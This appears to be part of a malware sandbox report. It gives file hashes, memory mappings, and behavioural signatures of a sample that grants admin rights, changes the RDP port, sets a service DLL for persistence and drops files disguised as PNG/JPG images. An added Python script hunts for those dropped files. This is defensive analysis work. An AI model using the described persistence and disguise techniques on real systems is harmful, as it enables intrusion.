MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/1056-65-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zzulzwbo.cmdline

MD5 4f15d7369bef139b87503b52293f6cfd
SHA1 e9d94c6b9a2d5bfa098e634942aab3280a3a6b68
SHA256 8b3a6bd136a7d060633dfc4710848b91372a526293ae3a62e2d22bec42203538
SHA512 6fb2b764f35b1d0aaa2c93af056536802fa4c1f2a3dcdefe6886948e8141edf66a54b28151dfb7ebb15965ecc1d6be98110c217ae836d654a18656d0546f5a13

memory/588-67-0x00000000023FB000-0x000000000241A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zzulzwbo.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/936-69-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC1046.tmp

MD5 37cbf8ed51ff6f9ead6d150889a98d7c
SHA1 00b86c549fa7ed97eb8be0bbef026d40a3d09864
SHA256 5e6f61e1e5293527e39494a00c5a80f0148fc285b3781918f357f5118ce3db58
SHA512 66ba96a6c7c1dcfcd62fd7942d9b3c7f8de49abd6444c50d2119d2527c63812eff1c97649842223655f60d14ce993df21719ff24f1e1d73411b020f531c6fc44

C:\Users\Admin\AppData\Local\Temp\RES1047.tmp

MD5 c07edee87321506129963d52adf00691
SHA1 852a61e06d9781be17f7859e0fcaedaa6890046f
SHA256 bfdccf4d9fe83ebebf5fb9cade82cefd977caa61594e7718f83f1ab7eb7b23d6
SHA512 144cffc7d5db2f3fe4591b1089e33ffeaaf58f3854c855e0c8770e28acb098cf092fe7d417640316cd2039f4361beff3b55fd703c87ff289061ed09300e2803e

C:\Users\Admin\AppData\Local\Temp\zzulzwbo.dll

MD5 fc1fcea0e377f949ca523347a5489a06
SHA1 36fd47bac965a954fdd2a33133c1db4171b50d27
SHA256 5f1a684fece7d66b11664497d19048947b8eacfbdb5cbaa44577ffeae500daad
SHA512 60385ab361e3c359954897100050327a480e09d41e0a4113ad4f8b020b049a3b8f018451ec67640b72261b35e0c7a9b89a92b09955dde0132b3561f761a5a15c

C:\Users\Admin\AppData\Local\Temp\zzulzwbo.pdb

MD5 6c46f8fcebd944e2bec33c0fc73af629
SHA1 419a7f6fe49d69500e11df17a565dcc961723fcf
SHA256 b5d600eb0b73bd27e7cb7cb9149717ee989037036cc229cbf95e36d17f5592a7
SHA512 4a5d2046beb96c53e6a10da4ac0fdaa5e7be2d2f0f003f6d6081a86323a09a61ecd7fe24dabe9691144c110b0d37cb0904597141089634df2c6a0b48418bc5f7

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 00fb904b2dd958760943b89400e9b7f9
SHA1 8c825862b6f70cbaef991525f31100f713e61e7d
SHA256 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512 ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

memory/588-76-0x000000000241D000-0x000000000241E000-memory.dmp

memory/1056-75-0x00000000020D0000-0x00000000020D2000-memory.dmp

memory/560-77-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7870e7807fd0aa185ee82df60bcc0c92
SHA1 b82913e640f225175720a885dd3e0f020c3b5cb9
SHA256 57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA512 9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9

memory/560-80-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/560-83-0x0000000002642000-0x0000000002644000-memory.dmp

memory/560-84-0x0000000002644000-0x0000000002647000-memory.dmp

memory/560-85-0x0000000002647000-0x0000000002648000-memory.dmp

memory/560-82-0x0000000002640000-0x0000000002642000-memory.dmp

memory/560-81-0x000000001B7C0000-0x000000001BABF000-memory.dmp

memory/1160-86-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7870e7807fd0aa185ee82df60bcc0c92
SHA1 b82913e640f225175720a885dd3e0f020c3b5cb9
SHA256 57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA512 9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9

memory/1160-89-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/560-90-0x000000000264C000-0x000000000266B000-memory.dmp

memory/1160-92-0x0000000002820000-0x0000000002822000-memory.dmp

memory/1160-93-0x0000000002822000-0x0000000002824000-memory.dmp

memory/1160-91-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

memory/1160-94-0x000000000282C000-0x000000000284B000-memory.dmp

memory/1160-95-0x0000000002824000-0x0000000002827000-memory.dmp

memory/1160-96-0x0000000002827000-0x0000000002828000-memory.dmp

memory/792-97-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7870e7807fd0aa185ee82df60bcc0c92
SHA1 b82913e640f225175720a885dd3e0f020c3b5cb9
SHA256 57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA512 9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/792-101-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/792-102-0x000000001B950000-0x000000001BC4F000-memory.dmp

memory/792-103-0x0000000002650000-0x0000000002652000-memory.dmp

memory/792-104-0x000000000265C000-0x000000000267B000-memory.dmp

memory/792-105-0x0000000002652000-0x0000000002654000-memory.dmp

memory/792-106-0x0000000002654000-0x0000000002657000-memory.dmp

memory/792-107-0x0000000002657000-0x0000000002658000-memory.dmp

memory/1584-108-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1676-110-0x0000000000000000-mapping.dmp

memory/1964-111-0x0000000000000000-mapping.dmp

memory/1396-112-0x0000000000000000-mapping.dmp

memory/844-113-0x0000000000000000-mapping.dmp

memory/1352-114-0x0000000000000000-mapping.dmp

memory/1324-115-0x0000000000000000-mapping.dmp

memory/320-116-0x0000000000000000-mapping.dmp

memory/1516-117-0x0000000000000000-mapping.dmp

memory/1636-118-0x0000000000000000-mapping.dmp

memory/1600-119-0x0000000000000000-mapping.dmp

memory/1812-120-0x0000000000000000-mapping.dmp

memory/936-121-0x0000000000000000-mapping.dmp

memory/1580-122-0x0000000000000000-mapping.dmp

memory/1192-123-0x0000000000000000-mapping.dmp

memory/1684-124-0x0000000000000000-mapping.dmp

memory/1584-125-0x0000000000000000-mapping.dmp

memory/1676-126-0x0000000000000000-mapping.dmp

memory/1092-127-0x0000000000000000-mapping.dmp

memory/1956-128-0x0000000000000000-mapping.dmp

memory/1380-129-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 b110f38845e18a04ab59a7d8a134ef40
SHA1 8119030034e6fbe62d875e824b5233c1f29d61a0
SHA256 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA512 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

\Windows\Branding\mediasvc.png

MD5 5768a809b9fcbff117dffa8cbf2e8852
SHA1 a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA256 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA512 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

memory/1700-132-0x0000000000000000-mapping.dmp

memory/1600-133-0x0000000000000000-mapping.dmp

memory/1812-134-0x0000000000000000-mapping.dmp

memory/1696-135-0x0000000000000000-mapping.dmp

memory/1708-136-0x0000000000000000-mapping.dmp

memory/780-137-0x0000000000000000-mapping.dmp

memory/676-138-0x0000000000000000-mapping.dmp

memory/1704-139-0x0000000000000000-mapping.dmp

memory/1776-140-0x0000000000000000-mapping.dmp

memory/1628-141-0x0000000000000000-mapping.dmp

memory/1524-142-0x0000000000000000-mapping.dmp

memory/456-143-0x0000000000000000-mapping.dmp

memory/1724-144-0x0000000000000000-mapping.dmp

memory/1188-145-0x0000000000000000-mapping.dmp

memory/1812-146-0x0000000000000000-mapping.dmp

memory/1176-147-0x0000000000000000-mapping.dmp

memory/1176-149-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/1176-150-0x00000000011D0000-0x00000000011D2000-memory.dmp

memory/1176-151-0x00000000011D2000-0x00000000011D4000-memory.dmp

memory/1176-152-0x00000000011D4000-0x00000000011D7000-memory.dmp

memory/1176-153-0x00000000011DB000-0x00000000011FA000-memory.dmp

memory/1092-154-0x0000000000000000-mapping.dmp

memory/780-155-0x0000000000000000-mapping.dmp

memory/1168-156-0x0000000000000000-mapping.dmp

memory/2004-157-0x0000000000000000-mapping.dmp

memory/2036-158-0x0000000000000000-mapping.dmp

memory/912-159-0x0000000000000000-mapping.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
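
The three dropped files with recorded hashes in this run (rfxvmt.dll under System32, mediasrv.png and mediasvc.png under Windows\Branding), plus wupsvc.jpg, which the behavioral2 run creates without a hash appearing in this section, make a small hunt list. The Python below is an added example, not part of the sandbox output: it normalizes Windows paths to one key, matches by path and SHA256, and additionally flags any .png or .jpg in Windows\Branding whose header does not belong to the format its extension claims. The scan roots, the finding labels and that magic-byte heuristic are the example's own assumptions; the report does not state what these files contain, so a variant with different hashes is caught only by path or by the heuristic. The empty-content hash that the named-pipe entries above carry (d41d8cd9…/e3b0c442…) is what sha256_hex returns for zero bytes.

```python
"""Hunt for the files this sample dropped.

Added example, not part of the sandbox report. Paths and SHA256 values are
copied from the 'Files' section above; the scan roots, finding labels and
the image-header heuristic are this example's own assumptions.
"""
import hashlib
import os
import sys
from pathlib import Path, PureWindowsPath

# SHA256 recorded by the sandbox for the dropped files. Keys are normalized:
# drive and leading separator removed, forward slashes, lower-case.
REPORT_HASHES = {
    "windows/system32/rfxvmt.dll":
        "6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9",
    "windows/branding/mediasrv.png":
        "1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea",
    "windows/branding/mediasvc.png":
        "8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094",
}
# Created in behavioral2 but with no hash in the report: path match only.
REPORT_PATHS = set(REPORT_HASHES) | {"windows/branding/wupsvc.jpg"}

# Header bytes of the formats the Branding files' extensions claim. A file
# there with one of these extensions and a different header is flagged
# (heuristic; the report does not say what the files actually contain).
IMAGE_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff"}
BRANDING_DIR = "windows/branding"
WATCHED_DIRS = (BRANDING_DIR, "windows/system32")


def normalize(path_text: str) -> str:
    """Map 'C:\\Windows\\Branding\\X.png' and '\\Windows\\branding\\x.png' to one key."""
    win = PureWindowsPath(path_text.replace("/", "\\"))
    parts = win.parts[1:] if win.anchor else win.parts  # drop 'C:\\' or '\\'
    return "/".join(parts).lower()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(path_text: str, data: bytes,
             hashes=REPORT_HASHES, paths=REPORT_PATHS) -> list[str]:
    """Findings for one file's path and content; an empty list means no match."""
    key = normalize(path_text)
    findings = []
    if key in paths:
        findings.append("known-path")
    if hashes.get(key) == sha256_hex(data):
        findings.append("hash-match")
    ext = os.path.splitext(key)[1]
    magic = IMAGE_MAGIC.get(ext)
    if magic and os.path.dirname(key) == BRANDING_DIR and not data.startswith(magic):
        findings.append("not-a-" + ext[1:])
    return findings


def scan_entries(entries) -> dict[str, list[str]]:
    """entries: iterable of (path_text, bytes). Returns only files with findings."""
    results = {}
    for path_text, data in entries:
        hits = classify(path_text, data)
        if hits:
            results[normalize(path_text)] = hits
    return results


def candidate_files(root: Path):
    """Yield (path, bytes) for the files under root worth reading: the named
    paths, plus every .png/.jpg in Windows\\Branding for the header check."""
    for rel_dir in WATCHED_DIRS:
        directory = root / rel_dir
        if not directory.is_dir():
            continue
        for entry in directory.iterdir():
            if not entry.is_file():
                continue
            key = normalize(str(entry.relative_to(root)))
            if key in REPORT_PATHS or (rel_dir == BRANDING_DIR and
                                       entry.suffix.lower() in IMAGE_MAGIC):
                yield key, entry.read_bytes()


def hunt(root) -> dict[str, list[str]]:
    return scan_entries(candidate_files(Path(root)))


if __name__ == "__main__":
    system_root = sys.argv[1] if len(sys.argv) > 1 else "C:\\"
    for key, hits in hunt(system_root).items():
        print(f"{key}: {', '.join(hits)}")
```

Run it with the system drive as the argument (or a mounted image of one); a file that reports only `known-path` is at a path this sample used but with content the report did not hash, and deserves a manual look rather than a dismissal.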

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-02 16:25

Reported

2021-09-02 16:55

Platform

win10v20210408

Max time kernel

1710s

Max time network

1741s

Command Line

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ymxdzjh2.nfm.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qaeldrbj.blu.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF506.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF526.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF527.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF497.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF4F6.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
